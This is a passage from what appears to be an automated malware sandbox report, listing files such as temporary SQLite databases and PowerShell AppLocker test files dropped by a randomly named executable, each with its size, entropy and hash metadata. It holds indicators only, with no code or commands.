Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TzOTDaKMEn

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UEOrLfyMmC

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UEPBftMjdH

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UGTH8gn2xg

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UIhMzb3VmQ

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UVL0n3fFnw

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VIdkkPTE1H

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VcsqvPRnSy

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Vls36tIcpr

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Vps7PmWDVK

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Wu3XfPEK8s

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XBMbOQTg3X

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XRaqcnjU2l

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XxcV9KMyZa

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Y8tIOTHmdj

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YG8w5hbK9Q

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YVdYBu0uoY

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YsozfMB8ke

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ZSRSJMAnRc

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ZWYTOat1Re

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0uw00jpz.f1z.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0y05zoiu.x3a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dt4twma.ike.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1obj353u.zim.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2s1ng1v5.x0m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2v4abqc1.wcc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3c0dbbrb.yds.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xlokqdr.wrn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
